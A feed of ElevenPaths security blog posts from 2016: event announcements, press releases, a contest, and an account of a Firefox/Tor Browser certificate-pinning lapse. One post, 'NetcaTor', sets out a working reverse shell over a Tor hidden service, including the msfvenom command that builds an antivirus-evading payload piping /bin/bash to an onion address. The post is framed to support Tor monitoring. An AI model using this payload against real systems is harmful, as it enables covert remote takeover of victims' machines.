Quantcast
Channel: ElevenPaths Blog
Viewing all 1287 articles
Browse latest View live

Una investigación de ElevenPaths en la RSA Conference de Abu Dhabi 2016

$
0
0
Una investigación promovida desde el área de innovación y laboratorio de ElevenPaths, ha sido aceptada para participar en la RSA Conference de Abu Dhabi 2016 que tendrá lugar en noviembre y donde se presentarán los resultados.

Las conferencias RSA (cuyo mayor exponente se celebra en Estados Unidos) es reconocida mundialmente como el evento más importante para unir a investigadores de la industria de la seguridad a todos los niveles. Se ha convertido en el referente mundial para que se compartan ideas sobre seguridad, se desvelen los últimos productos de las compañías, y se impartan charlas, talleres, conferencias, etc. Tiene una afluencia de público cercana a los 50.000 visitantes al año.


La publicación "Android Malware Pattern Recognition for Fraud and Attribution" será presentada por Adolfo Hernández, Cybersecurity Advisor de Telefóncia y Ahmed Alketbi, Senior Manager, Security Solutions Marketing de Etisalat. Además, la investigación será publicada en "Encyclopedia on Social network analysis and mining (ESNAM)" editada por Springer.

La investigación habla de las técnicas de reconocimiento de patrones de malware y su problemática ante las nuevas amenazas. Aunque los métodos de Big Data y machine learning permiten aliviar el trabajo más duro para combatir el problema, los atacantes saben cómo eludir los controles de seguridad. Si se estrecha el alcance del Big Data hasta el punto en el que la HUMINT puede abordarlo, se estará aprovechando ambas técnicas y mejorándolas.

Fruto de esta investigación y difusión se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.


ElevenPaths Talks: BioHacking

$
0
0



El próximo jueves 29 de septiembre nuestro compañero Gabriel Bergel impartirá una charla sobre BIO Hacking en la que se abordarán los conceptos y el lenguaje básico del BioHacking, tratando así de acercarte a este tema y sorprenderte con todo lo que se puede hacer. Gabriel te contará la historia de BioHacking, la ética y moral que rigen sus conceptos, sin dejar de lado las explicaciones de algunos experimentos básicos, etc.

La duración de la charla de Gabriel será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla serán las 15.30  (hora España). La charla estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangout. La sesión se impartirá en castellano.

Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Community, dónde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes mirar el calendario de talks para ver las que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 29 de septiembre en horario de 15.30 (hora España). Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

Más información en:
talks.elevenpaths.com

Aplicación práctica sobre NetcaTor, una shell inversa a través de Tor

$
0
0
Uno de los puntos débiles de los atacantes a la hora de exfiltrar información comprometida es la exposición de parte de su infraestructura tecnológica durante el proceso. En este sentido, la red Tor ofrece la posibilidad de hacer accesibles servicios en una máquina como servicios ocultos o hidden services aprovechando la capa de anonimato que ofrece y así evitar que quede expuesta la localización real de la máquina.

Cómo configuramos un hidden service
La configuración de un hidden service es sencilla y además está bien documentada por parte de los desarrolladores del proyecto Tor dentro del propio código como en la propia web del proyecto. Virtualmente, cualquier servicio que utilice tráfico TCP puede ser creado a través de la red Tor modificando la configuración del archivo torrc.

La creación del hidden service con Tor instalado en una máquina requiere la edición del fichero de configuración de Tor torrc que se encuentra en la ruta /etc/tor/ en sistemas operativos Linux. En las líneas del fichero 63 y siguientes se detallan ejemplos de cómo configurar un hidden service. La primera de ellas establecerá la ruta en la que se almacenará la información relativa al hidden service y que será creada si no existe por el servicio que arranca Tor. En esa ruta se almacenan dos archivos importantes: hostname, que contiene el dominio que otros podrán utilizar para acceder al servicio y private_key, el fichero que almacena la clave privada del hidden service y cuya custodia queda a cargo del administrador del sitio siendo necesario que permanezca secreta.

############### This section is just for location-hidden services ###

## Once you have configured a hidden service, you can look at the
## contents of the file ".../hidden_service/hostname" for the address
## to tell people.
##
## HiddenServicePort x y:z says to redirect requests on port x to the
## address y:z.

#HiddenServiceDir /var/lib/tor/hidden_service/
#HiddenServicePort 80 127.0.0.1:80

Por ejemplo, en el caso de que hubiéramos desplegado un servidor Apache en el puerto 80, podríamos hacerlo accesible a través de un hidden service editando la configuración y descomentando la información de las líneas 72 y 73 de dicho fichero para crear los archivos hostname en la ruta /var/lib/tor/hidden_service/ y redirigir el tráfico que reciba Tor en el puerto 80 a ese hidden service al puerto 80 de la máquina local en donde está esperando el servidor Apache.

Esta aproximación podría llevarse a cabo también para exponer un servicio SSH accesible a través de Tor, modificando las líneas relativas al HiddenServicePort para que apunten al puerto 22. Para acceder a dicho servicio existen diferentes aproximaciones, pero la más sencilla es la de lanzar el comando de conexión precediéndolo del comando torify, que se encargará de redirigir el tráfico de red para enviarlo a través de la instancia de Tor que esté en ejecución en dicha máquina.

La prueba de concepto
Desde el punto de vista de la arquitectura necesaria para esta prueba de concepto se asumirá qué víctima y atacante están utilizando sistemas Linux y tienen Tor instalado y corriendo como servicio. El procedimiento seguido para llevar a cabo esta prueba de concepto es el siguiente:

   1. Despliegue del servicio malicioso a la escucha en la máquina atacante. En este caso se desplegará un netcat a la espera de conexiones en el puerto 1234 de la máquina local. No es necesario exponer públicamente el servicio ya que el tráfico en ese puerto será encaminado hacia y desde Tor.
    Attacker > nc -v -l -p 1234 127.0.0.1

       2. Configuración de Tor en la máquina atacante para hacerlo accesible a través de un dominio .onion. Utilizando como plantilla el fichero torrc, se añaden dos líneas nuevas que especifican la ruta en la que se generarán los ficheros auxiliares del servicio y las reglas de direccionamiento.

    HiddenServiceDir /var/lib/tor/nc_hidden_service/
    HiddenServicePort 1234 127.0.0.1:1234

    El dominio .onion definido en el archivo hostname estará disponible apenas unos segundos después de arrancarlo. En el caso de esta prueba de concepto el dominio generado es: vks3v4ilo4tgud7h.onion.

    Attacker > service tor restart

    Figura 1. Esquema del sistema malicioso que utiliza Tor para la exfiltración de información.

       3. Preparación del payload torificado por parte del atacante. El payload se generará con la utilidad msfvenom de Metasploit Framework utilizando el módulo linux/x86/exec que torificará la conexión de netcat hacia el dominio .onion del atacante y que permitirá al atacante la ejecución de comandos.

    Attacker > msfvenom -p linux/x86/exec CMD="torify nc vks3v4ilo4tgud7h.onion 1234 -e /bin/bash" -f elf R > poc

       4. Ejecución del payload torificado en la máquina de la víctima. Aunque se podría realizar explotando algún tipo de vulnerabilidad, para simplificar el proceso en este caso se ha ejecutado directamente el payload generado.

    Victim > chmod +x poc
    Victim > ./poc

       5. Explotación por parte del atacante de la shell redirigida hacia netcat.

    En este caso, se asume que la víctima cuenta con Tor instalado y la aplicación torify disponible. En el supuesto de no ser así, se podría instalar automáticamente desde los repositorios oficiales de la distribución si el usuario dispone de los permisos adecuados y así proceder a su instalación. En cualquier caso, si el usuario no tiene permisos de administración se podría incluir también el proceso de descarga de la última instancia de Tor y compilarla desde las fuentes satisfaciendo las dependencias o accediendo a versiones precompiladas de la aplicación. El primer análisis del payload generado en esta prueba de concepto en Virustotal no ha sido clasificado como malicioso por ninguna de las 53 soluciones de antivirus.

    Figura 2. Ejemplo de la ejecución de la prueba de concepto en una máquina local.

    Hemos creado entonces un payload utilizando el módulo exec con msfvenom. El inconveniente que tiene es que tenemos que recordar el comando completo que tenemos que ejecutar. Una aproximación más cómoda sería crear a partir de ese módulo uno nuevo que directamente nos solicitara el dominio .onion y el puerto al que nos vamos a conectar. En el siguiente repositorio de Github podréis acceder al nuevo módulo que hemos creado.

    Esta prueba de concepto pone sobre la mesa la necesidad de monitorizar si máquinas consideradas como críticas están usando Tor para comunicarse con la red y determinar si este comportamiento es esperado o si podría ser consecuencia de un potencial encubrimiento de comunicaciones maliciosas.


    Quiero ir a Security Innovation Day 2016 de ElevenPaths y Telefónica

    $
    0
    0


    SORTEAMOS 1 ENTRADA DOBLE
    ¡Sorteamos 1 entrada doble para Security Innovation Day 2016! Sí, has leído bien. Si quieres asistir al evento del año sobre innovación y seguridad, participa en nuestro concurso.

    ¿Qué hay que hacer para participar y ganar?
    1. Sigue a ElevenPaths en Twitter
    2. Comparte este tuit » Quiero ir a Security Innovation Day 2016 de @ElevenPaths y @Telefonica #SID2016


    El ganador se elegirá el día 3 de octubre de 2016 de manera aleatoria.

    ¡Mucha suerte y nos vemos en Security Innovation Day!


    Participating in GSMA Mobile 360 LATIN AMERICA

    $
    0
    0
    Mobile 360 - Latin America brings market leaders from Central and South America across the mobile telecom ecosystem for a two-day thought leadership conference together with operator-led Working Groups on day three. Attendees will learn and discuss key drivers in innovation in the region centered around IoT, Connected Car, Mobile Identity, Mobile Money, NFV, 5G, Media & Advertising, and more. In addition, an Innovation Showcase panel will allow start-ups to hear from venture capitalists, investors, and industry experts followed by a pitch session for the start-ups.

    Session: Mobile Identity
    There is no denying that mobile technology is deeply embedded into our lives. More and more industries are incorporating mobile into their business models and leveraging digital communications. While this improves efficiencies and can create competitive advantages, it also adds additional challenges to organisations to protect both themselves and their customers. If this aspect of the business is ignored or done poorly, the results can be catastrophic to the organisation.

    Much focus has been placed on server integrity, internet security, cloud protection and safe data exchange in the traditional business models. What is new and must be explored is the data flow through the mobile ecosystem, specifically mobile security and data privacy. M2M and IoT will continue to grow and new security threats will emerge. How is this data being shared across the value chain? How can organisations ensure their data is safe as it travels through the network? How should companies respond to security breaches? What are the new rules with regard to privacy? How should enterprises be protected in this increasingly connected world?

    Óscar Mancebo, Head of Mobile Connect at Telefónica

    An increasing number of digital services, including financial and government services, are offering customers access using digital authentication and identity. Despite the complexity involved in deployment, digital authentication enables users to have a better quality of experience by giving them greater control over their own digital identities, and also enables more effective customer data management by service providers. A range of service providers are offering digital authentication and identity services today, from mobile operators to specialist companies, often utilising different technology approaches.

    Telefónica has played a relevant role in this session, describing how Mobile Connect is well positioned as an alternative to the password based model and explaining how this product is fully aligned with the new strategic plan announced some weeks ago by the Company: We choose it all.


    For more information on Mobile Connect and to see it in action go to:
    www.elevenpaths.com

    Mobile Connect website:
    https://mobileconnect.io/

    La curiosa historia de la vulnerabilidad "cíclica y programada" en HPKP de Firefox

    $
    0
    0
    Probablemente esta sea una de las historias más curiosas sobre cómo se ha descubierto un fallo de seguridad, además de un fallo de seguridad en sí mismo de lo más rocambolesco. De cómo se descubrió un problema de ejecución de código en Tor Broswer, que en realidad acabó además en un grave agujero de implementación de HPKP en Firefox tras un proceso complejo que ha desconcertado a muchos especialistas intentando aclarar la situación. Ha pasado desapercibida para los medios, pero merece la pena analizarla.

    El "no fallo" en Tor Browser

    Movrcx descubrió un fallo muy peculiar a principios de septiembre. Defendía que había encontrado una fórmula en el que podía ejecutar código en cualquier usuario de Tor Broswer (basado en Mozilla Firefox ESR, la Extended Support Release). Y no por un fallo explotable en el navegador, sino por el propio funcionamiento del ecosistema de Tor. Lo "único" que necesitaba el atacante era disponer de un certificado TLS válido del dominio "addons.mozilla.org". Esto mitiga mucho el alcance de la vulnerabilidad, y pocos se lo tomaron en serio. Pero aunque parezca complicado, lo cierto es que ese certificado ya fue comprometido en su día por iraníes... Y aun así, si lo que se quiere es espiar qué se hace en la red Tor, definitivamente es algo al alcance de un gobierno. Además, Movrcx no argumentaba el fallo en sí como el problema mayor, sino el hecho de que un simple certificado fuese el requisito más complejo para poder potencialmente ejecutar código en cualquier usuario del navegador Tor.

    Si el atacante podía controlar la url de actualización haciéndole pensar que era addons.mozilla.org,
    podría redirigir a la víctima a cualquier web para actualizar

    El fallo consistía en una cadena de errores, como todo buen problema de seguridad con raíces en los procedimientos y no tanto en el código. Se basaba en que el sistema de actualización de plugins de Mozilla (y de Tor Browser), permitía autofirmar extensiones. Además, Tor Browser pregunta cada 24 horas por una actualización de extensiones de forma automática. Si en un nodo de salida (controlado por el atacante) se consigue redirigir a la víctima a una página que parece ser la de "versioncheck.addons.mozilla.org" (falseada gracias al certificado) y que durante la actualización se descargue una extensión que no es el verdadero NoScript (por poner un ejemplo de plugin que viene de serie con Tor Broswer), este sería validado e instalado de forma totalmente transparente para el usuario.Puede parecer un poco rebuscado porque precisamente para evitar esto están los certificados. El descubrimiento fue criticado no solo por eso, sino porque según los más avispados, no solo necesitaba el certificado para consumar el ataque, sino también romper el pinning del navegador, que es precisamente para lo que sirve (y con lo que demuestra su utilidad). El ataque parecía una farsa, irrealizable. Pero Movrcx no mentía, a él le había funcionado incluso con el pinning activo… y podía demostrarlo. ¿Había otro error en la implementación de pinning? No parecía, porque lo curioso es que avanzado septiembre, en fechas diferentes, el ataque ya no funcionaba a quien intentaba reproducirlo. El pinning lo protegía.¿Qué demonios estaba pasando? Esto ha mantenido a una serie de expertos indagando durante días. Veamos qué pasaba.

    El "sí fallo" en el "no uso" de HPKP

    Muchos vieron un fallo fundamental en la conceptualización del ataque: le funcionaba porque en su entorno obviamente no falsificó un certificado real sino que en el laboratorio había usado una CA introducida a mano como raíz en Tor Browser, y por defecto, Mozilla no pinea certificados metidos por el propio usuario. En la vida real, no hubiera funcionado. Esta función se llama security.cert_pinning.enforcement_level en about:config, que está establecido a 1 en Firefox, o sea, no pinear certificados autointroducidos por el usuario.

    Pero ya nos estábamos equivocando. Tor Browser es Firefox fortificado, y en Tor, security.cert_pinning.enforcement_level está por defecto a 2... pinear siempre. El ataque no tenía que haberle funcionado ni en real ni en laboratorio. ¿Qué pasaba? Compilaron Tor Broswer para ver si tenía algún error al detectar CA propias o ajenas, muchos expertos comenzaron a lanzar teorías… O bien creían la versión de Movrcx o bien no le daban la mayor importancia al ataque. Pero algo no cuadraba… y algunos se quedaron investigando.

    Finalmente, se desveló un dato curioso: este fallo podía ser cíclico y funcionar durante ventanas de tiempo cambiantes y cada cierto tiempo. Por ejemplo, el ataque sería posible durante algunos días de noviembre en el futuro, o durante 35 días desde diciembre a enero de 2017. Como decía Ryan Duff.. una vulnerabilidad "programada" ya de por sí tiene interés.

    La raíz del problema

    Lo que pasaba es que addons.mozilla.org. no utiliza HPKP para pinear su certificado. Usa algo mucho más estático: en cada nueva publicación de Firefox, incrusta el pin en el código con fecha de caducidad. Esto tiene sentido porque así no tiene que recogerlos la primera vez del servidor (están "preloaded"), y esto nos alivia el problema de que esa primera vez que se recogen los pines, exista un hombre en el medio. Los pines, tanto de HPKP como incrustados, tienen que caducar. Si no, se corre el riesgo de que sean comprometidos, deban ser reemplazados, y el navegador que los recuerda nunca los olvide. Ante el miedo a que un usuario no pueda acceder a una página porque por una emergencia el servidor ha cambiado el certificado y el navegador recuerda otro, se utilizan periodos de caducidad relativamente cortos. Si algo pasa, al menos la ventana de tiempo del problema se minimiza. También se corre el riesgo de que un usuario que no actualiza su Firefox (entre otros problemas de seguridad que asume al no hacerlo), pierda acceso al final hacia el sitio donde quiera ir porque nunca renovaría su certificado. En resumen, un pin caducado, deja de tener efecto. Así que es buena idea que caduquen pero… ¿cuándo es lo ideal? ¿cuándo deben caducar los pines incrustados de una página esencial de Firefox y controlada por ellos mismos? Muy sencillo: al menos hasta que aparezca la siguiente versión de Firefox con una nueva fecha. De lo contrario, el pinning no tendrá efecto desde la fecha de caducidad hasta que el navegador sea actualizado. Y aquí es donde justa y sorprendentemente fallaron todos los controles de Mozilla.

    Por ejemplo (y son datos reales), Firefox ESR 45.3.0 salió el 2 de agosto con la caducidad de los pines incrustada para el 3 de septiembre. Firefox ESR 45.4.0 no salió hasta el 20 de septiembre… así que del 3 de al 20 de septiembre, para todo usuario de Firefox ESR 45.3 y 45.4 (y Tor Browser) incluso actualizando el mismo día, los pines no eran efectivos. Justo en el periodo en el que Movrcx realizó sus pruebas.

    Simplemente no se hacía certificate pinning. Tor Browser sigue los pasos de las releases ESR de Mozilla y por tanto… Movrcx tenía razón, y sus escépticos detractores que hicieron pruebas más tarde… también.

    Conclusiones

    Mozilla ha reaccionado rápido y bien. Una de las contramedidas ha sido no depender solo de pines estáticos, sino introducir HPKP para que el pineo sea también dinámico. Gracias a la extensión de Firefox PinPatrol podemos comprobarlo, además de ver en claro cuándo expiran los pines, por si existiera algún otro problema… (Mozilla sigue sin dar una interfaz a este tipo de datos almacenados en el navegador).

    Mozilla ha añadido pines HPKP a muchos de sus dominios y subdominios,
    aunque estuvieran también incrustados en el navegador


    Ivan Ristic planteaba curiosamente a principios de septiembre una pregunta: "¿Está HPKP muerto?". Su argumentación es impecable, pero no creo que sea la conclusión adecuada. HPKP es útil, necesario y realiza su cometido. La mayor parte del problema, decía curiosamente, está en que los administradores no conocen qué políticas aplicar para desplegarlo. También en cómo lo implemente cada cliente (sobre esto presentaremos una investigación de ElevenPaths sobre HPKP y HSTS en la Cryptology and Network Security Conference 2016 en Milán en noviembre.). Con este fallo se demuestra que HPKP está vivo (ha resuelto un problema y prevenido un ataque) pero que como suele ocurrir, efectivamente es necesario entender el protocolo o de lo contrario, no servirá de nada. Pero esto ocurre con HPKP y cualquier otra medida de seguridad que se nos ocurra.

    Sergio de los Santos
    ssantos@11paths.com

    ElevenPaths Talks: Malware en medios de pago no tradicionales

    $
    0
    0


    El próximo jueves 6 de octubre nuestro compañero Leandro Bennaton impartirá una charla sobre Malware en medios de pago no tradicionales, ¿Crees que los medios de pagos poco conocidos son seguros? En este webcast gratuito se analizará un curioso caso que demostrará lo contrario. ¿Te lo vas a perder?

    La duración de la charla de Leandro será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla será a las 15.30h (Madrid) y estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangouts y se impartirá en castellano.

    Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Comunidad, donde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes consultar el calendario de talks para ver los webcasts que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 6 de octubre a las 15.30h (Madrid)Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

    Más información en:
    talks.elevenpaths.com



    Telefónica y ElevenPaths presentamos el nuevo Path6, nuevas alianzas e inversiones

    $
    0
    0

    Tercer aniversario como líder en innovación en ciberseguridad


    TELEFÓNICA PRESENTA LA SOLUCIÓN PATH6 Y SUS NUEVAS ALIANZAS E INVERSIONES EN EL IV SECURITY INNOVATION DAY

    • Nuevas alianzas con los principales socios tecnológicos del sector como Fortinet, F5 Networks, Spamina, Logtrust, Apple y Gradiant, e inversiones como en CounterCraft , 4iQ o IMBox siguen siendo estratégicas para la compañía

    • Hugh Thompson, CTO de Symantec + Blue Coat, y uno de los cinco pensadores más influyentes del mundo en Seguridad de la Información, es el invitado y ponente estrella en el IV Security Innovation Day

    • ElevenPaths presenta “Path6”, una plataforma de detección y análisis de vulnerabilidades de forma continua en apps móviles a escala global

    • Este evento internacional puede seguirse en español e inglés por streaming a través de securityinnovationday.elevenpaths.com/streaming

    Madrid, jueves 6 de octubre de 2016.- Chema Alonso, Chief Data Officer de Telefónica y Chairman de ElevenPaths, ha sido el encargado de presentar el IV Security Innovation Day, evento de referencia nacional e internacional sobre innovación y seguridad, donde la compañía presenta su estrategia en materia de Ciberseguridad. Ha estado presente también en esta presentación Pedro Pablo Pérez, CEO de ElevenPaths, quien ha afirmado que “seguimos apostando por la innovación y las alianzas con los grandes players del mercado, como camino hacia un futuro más seguro”.

    La jornada ha contado con Hugh Thompson como invitado estrella, considerado uno de los cinco pensadores más influyentes en materia de Seguridad de la Información en el mundo y CTO de Symantec+Blue Coat. Ambas compañías acaban de desarrollar una integración tecnológica que permitirá a los clientes de Telefónica controlar las filtraciones y definir políticas de seguridad en el uso de servicios SaaS (servicios en la nube como Dropbox, Outlook 365, OneDrive, Salesforce, etc.) utilizando el servicio Elástica de Symantec+Blue Coat.

    La importancia de aliarse con los mejores socios
    Para ElevenPaths, -la unidad de Ciberseguridad de Telefónica-, es imprescindible aliarse con los mejores socios para ofrecer las soluciones más innovadoras a empresas y particulares en un entorno en el que las ciberamenazas aumentan continuamente.

    Durante la jornada también se ha presentado la colaboración establecida con Apple. El resultado es una solución empresarial de firma manuscrita biométrica para el sector sanitario. Combinando las funcionalidades avanzadas de SealSign BioSignature de ElevenPaths y la familia iPad Pro, iPhone/iPod, el usuario obtiene una autenticación segura mediante su firma con plena validez legal de los documentos firmados. Próximamente esta solución se adaptará para satisfacer las necesidades específicas y de regulación de otros clientes de los sectores Financiero, Administraciones Públicas, Energía y Servicios.

    El nuevo Programa de Partners de ElevenPaths es el marco perfecto sobre el que se están construyendo acuerdos como el recientemente firmado con Gradiant -Centro Tecnolóxico de Telecomunicacións de Galicia- para trabajar juntos por la innovación en seguridad y privacidad. Además, con el objetivo de llevar al mercado nuevos servicios y soluciones, ElevenPaths también está colaborando con las startups de seguridad CounterCraft -compañía de contrainteligencia en el ámbito de la ciberseguridad-, IMBox - una solución de mensajería instantánea cifrada y segura- y 4iQ - plataforma de monitorización de fugas de información- en las que Telefónica, a través de su programa de innovación abierta Open Future_, ha invertido recientemente.

    Innovación y catálogo de soluciones
    ElevenPaths ha presentado el proyecto con nombre en código “Path6”, una tecnología propia desarrollada para detectar vulnerabilidades a gran escala en apps móviles. Un planteamiento totalmente novedoso que permite a las organizaciones analizar incluso aquellas aplicaciones de las que se desconoce su existencia. 
    Las jornadas han sido el marco en el que la compañía ha compartido el catálogo de soluciones de seguridad para combatir la industria del cibercrimen. Entre estas soluciones, dirigidas tanto a la pequeña como a la gran empresa, destacan las nuevas soluciones de:
    • Data Protection, para la protección de datos en todos los entornos
    • Fraude, para la detección anticipada de fraude digital
    • Industria 4.0, para identificar, evaluar y gestionar los riesgos a los que son susceptibles las infraestructuras industriales
    • Mobility, para ayudar a las empresas a gestionar y proteger el acceso a la información corporativa
    • Gestión integral del riesgo y la seguridad, para para la gobernanza de la seguridad desde las unidades estratégicas de negocio.
    Por otro lado, Telefónica acaba de inaugurar el noveno Centro de Operaciones de Seguridad (SOCs) en México y el próximo mes de noviembre abrirá el nuevo Centro Global Avanzado (Telefónica Advanced Global SOC -TAGS-). Esta extensa red posibilita abordar los problemas de seguridad con un enfoque global sin perder la cercanía con sus clientes.

    Tres años de historia
    Telefónica, en su apuesta por hacer realidad la transformación digital, identificó la ciberseguridad como una pieza clave del proceso. Así nació ElevenPaths en abril de 2013 y con la creación de esta unidad, la compañía reforzó su visión con la innovación en seguridad, consolidándose como telco pionera en impulsar una nueva corriente en el mercado de la ciberseguridad.

    La firma de alianzas estratégicas con los principales fabricantes, empresas y organizaciones del sector aportan un valor diferencial a su oferta de ciberseguridad. Los nuevos acuerdos con Fortinet, F5 Networks, Spamina y Logtrust, que vienen a unirse a los ya existentes con Alien Vault, Symantec+Blue Coat, Intel Security, Palo Alto Networks, RSA, y Vaultive,  son claves para ofrecer las mejores versiones de los productos de ciberseguridad que demanda el mercado.

    ElevenPaths celebra tres años de ciberseguridad en los que ha combinado el desarrollo de innovadoras tecnologías propias con las mejores alianzas en el mundo de la seguridad. Tres años dando motivos para creer que es posible crear un mundo digital más seguro.

    Telefónica and ElevenPaths present new Path6 solution, alliances and investments

    $
    0
    0


    Third anniversary of leadership in innovation and cybersecurity

    TELEFÓNICA AND ELEVENPATHS PRESENT THE PATH6 SOLUTION, THEIR NEW ALLIANCES AND INVESTMENTS IN THE IV SECURITY INNOVATION DAY


    • New alliances with prominent technology partners of the sector, such as Fortinet, F5 Networks, Spamina, Logtrust, Apple and Gradiant, and investments in CounterCraft, 4iQ and IMBox, among many others, remain a strategic focus for the company

    • Hugh Thompson, CTO at Symantec + Blue Coat, and one of the world's five most influential thinkers on the subject of information security, is guest and keynote speaker at the IV Security Innovation Day

    • ElevenPaths presents “Path6”, a platform allowing for the continuous detection and analysis of vulnerabilities in mobile apps on a global scale

    • This international event can be followed via live-stream at securityinnovationday.elevenpaths.com/streaming

    Madrid, Thursday, 6 October 2016.- Chema Alonso, Chief Data Officer at Telefónica and Chairman of ElevenPaths, has been tasked with presenting the IV Security Innovation Day, a key national and international event on innovation and security, at which the company is presenting its cybersecurity strategy. In the words of Pedro Pablo Pérez, CEO of ElevenPaths: “We are committed to innovation and to forging alliances with the leading players in the market, as our chosen path towards a more secure future”.

    In attendance as a special guest was Hugh Thompson, widely considered one of the world's five most influential thinkers on the subject of information security and CTO at Symantec + Blue Coat. Both companies have just developed a technological integration enabling Telefónica customers to control security breaches and define security policies when using SaaS services (cloud services such as Dropbox, Outlook 365, OneDrive, Salesforce, etc.) by using Symantec + Blue Coat's new Elastica service

    The importance of joining forces with the best partners

    For ElevenPaths –Telefónica Cybersecurity Unit- it is essential to join forces with the best partners so as to be able to offer the most innovative solutions to businesses and private customers in a bid to counter the increasing number of cyberthreats.

    During the event, the company also discussed the alliance collaboration with Apple. The result of their partnership is a handwritten biometric signature recognition solution intended for companies of the healthcare sector. Combining the advanced functionalities of ElevenPaths' SealSign BioSignature and the iPad Pro, iPhone/iPod family, users can now obtain secure authentication by signing with the full legal force of signed documents. This solution is soon to be customized to meet specific regulatory requirements and other needs of other clients from the financial, energy and services sectors, as well as public authorities.

    The new Partners Program of ElevenPaths is the perfect foundation on which to construct agreements such as the one recently signed with Gradiant -Centro Tecnolóxico de Telecomunicacións de Galicia (Telecommunications Technology Centre of Galicia) -to innovate together in the fields of security and privacy. Furthermore, and with the aim of making new services and market-ready solutions, ElevenPaths is also collaborating with security start-ups CounterCraft -a counter-intelligence company operating in the field of cybersecurity-, IMBox -an encrypted and secure instant messaging solution- and 4iQ -a platform for monitoring information leaks- in which Telefónica has recently invested money through its Open Future open innovation programme.

    Innovation and catalogue of solutions

    ElevenPaths has unveiled a project with code name “Path6”; a proprietary technology developed to detect large-scale vulnerabilities in mobile apps. A totally new approach that allows businesses to analyse even those applications they did not even know existed.

    The events have provided an excellent platform for the company to share its catalogue of security solutions to combat the cybercrime industry. These solutions are intended for small and large companies alike and include the following brand new offerings:
    • Data Protection, to protect information across all environments
    • Fraud, for the early detection of digital fraud
    • Industry 4.0, to identify, assess and manage the risks to which industrial infrastructures are typically exposed
    • Mobility, to help companies manage and protect access to corporate information
    • One-stop management of risk and security, so that security can be managed from the strategic business units.
    In addition, Telefónica has recently opened its ninth Security Operations Centre (SOC) in Mexico and in November it is set to open its new Advanced Global Centre (Telefónica Advanced Global SOC -TAGS-). This extensive network will allow the company to tackle security threats and problems with a global focus but without having to distance itself from customers.

    Three years of history 

    Telefónica, as part of its drive to make the digital transformation a reality, flagged cybersecurity as a key part of the process. As a result, ElevenPaths was born in April 2013, immediately strengthening the group's long-term commitment to innovation and security and cementing its position as a front-running telco in championing and rolling out a new order within the cybersecurity market. 

    The value of its range of cybersecurity solutions has been increased further following the signing of strategic alliances with the main manufacturers, companies and organisations from the sector. The new agreements with Fortinet, F5 Networks, Spamina and Logtrust, which can be added to the existing partnerships with Alien Vault, Symantec+Blue Coat, Intel Security, Palo Alto Networks, RSA and Vaultive, are all essential in that they allow the company to offer the very best cybersecurity products currently in demand.

    ElevenPaths is celebrating three years of cybersecurity, during which time it has combined the development of innovative proprietary technologies with the best alliances possible in the world of security. Three years giving reason to believe that a more secure digital world is possible. 

    More information:
    www.elevenpaths.com

    » Download the press release Telefónica and ElevenPaths present new Path6 solution, alliances and investments in the IV Security Innovation Day

    Latch Plugins Contest: el concurso de plugins y hacks con que el puedes ganar hasta 5.000 dólares

    $
    0
    0



    ElevenPaths conovocamos una nueva edición del concurso LatchPlugins Contest, un reto para doers atrevidos y apasionados por la tecnología. ¿Quieres ganar 5.000 dólares? Deja volar tu imaginación y saca tu lado más hack.

    Es muy sencillo participar, puedes presentar trabajos de todo tipo, por ejemplo un Trabajo Fin de Carrera o Trabajo Fin de Máster, un plugin realizado en casa para proteger un sistema u operación propia, lógica o física, etc. Lo importante es la originalidad, el ingenio y la aportación de la solución con Latch.

    Para que no tengas ninguna duda, en nuestra Comunidad hemos dejado unos consejos sobre cómo desarrollar un plugin. Todos los SDK de Latch son Open Source, y el 99% de los plugins disponibles de Latch también lo son. Desde la web de Latch podéis acceder a toda la información de la API, la cual se encuentra documentada para los developers. La integración de Latch con las aplicaciones es muy sencilla, y se dispone de una gran cantidad de contenido disponible en la web para que puedas probarlo. Si quieres conocer los plugins (y su documentación) desarrollados hasta la fecha, accede al Github de ElevenPaths. Una vez allí, puedes descargar y analizar el código fuente de todos los plugins actuales para Latch.

    Para conocer la mecánica del concurso puedes consultar las bases legales, así como visitar nuestra Comunidad donde podrás preguntar, comentar y unirte a la conversación sobre el concurso Latch Plugins Contest.

    El plazo del concurso acaba el día 12 de diciembre de 2016, ¡no esperes al último día y participa en Latch Plugin Contest!

    Hay mucho que se puede "latchear". ¿Tú SmartTV?¿Tus XBOX?¿Un hack para controlar las sesiones de Facebook? El límite lo pones tú.

    ¡Mucha suerte!


    También te puede interesar:
    Los plugins de Latch que se llevaron los dólares y más hacks
    ¡Ya tenemos a los ganadores de nuestros concursos de talento!
    Latch para Jenkins, Latch para IoT y 20 plugins más
    Un "hack" con Latch para controlar accesos a Facebook


    Latch Plugins Contest: the plugins and hacks contest in which you can win up to 5,000 USD

    $
    0
    0



    ElevenPaths is announcing a new edition of the LatchPlugins Contest, a challenge for daring doers passionate about technology. Would you like to win 5,000 dollars? Then let your imagination run wild and release the hacker inside you.

    Taking part could not be easier. You can present any kind of work or project, such as a final year project for your degree or master's degree, a homebrew plugin to protect your own software, hardware, or processes, and so on. What matters is originality, ingenuity and how the solution contributes to Latch.

    To help you on your way, we have left some tips on how to develop a plugin on our Community. All Latch SDKs are open source and this is also the case for 99% of currently available Latch plugins. From the Latch website, you can find all the information on the API, which is documented for developers. Integrating Latch with applications is very straightforward and there is now a lot of content available on the website for you to give it a go. If you want to find out more about the plugins (and associated documentation) developed to date, just head to the Github of ElevenPaths. Once there, you can download and analyze the source code of all current Latch plugins.

    If you are unsure of how the contest works, please be sure to consult the legal terms, and visit our Community, where you can ask questions, post comments and join in conversations relating to the Latch Plugins Contest.

